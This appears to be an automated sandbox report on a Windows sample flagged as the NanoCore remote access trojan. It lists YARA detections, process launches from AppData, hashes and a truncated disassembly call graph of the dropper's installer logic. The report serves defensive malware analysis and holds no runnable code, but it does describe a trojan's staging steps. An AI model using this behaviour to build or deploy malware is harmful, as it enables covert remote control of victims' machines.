                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low

                  General

                  Target ID:3
                  Start time:23:17:19
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
                  Imagebase:0x1d0000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 65%, ReversingLabs
                  • Detection: 52%, Virustotal, Browse
                  Reputation:low

                  General

                  Target ID:6
                  Start time:23:17:23
                  Start date:03/02/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
                  Imagebase:0x980000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:7
                  Start time:23:17:29
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
                  Imagebase:0x1d0000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Target ID:9
                  Start time:23:17:30
                  Start date:03/02/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632
                  Imagebase:0x980000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:15.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.4%
                    Total number of Nodes:1385
                    Total number of Limit Nodes:25
                    execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 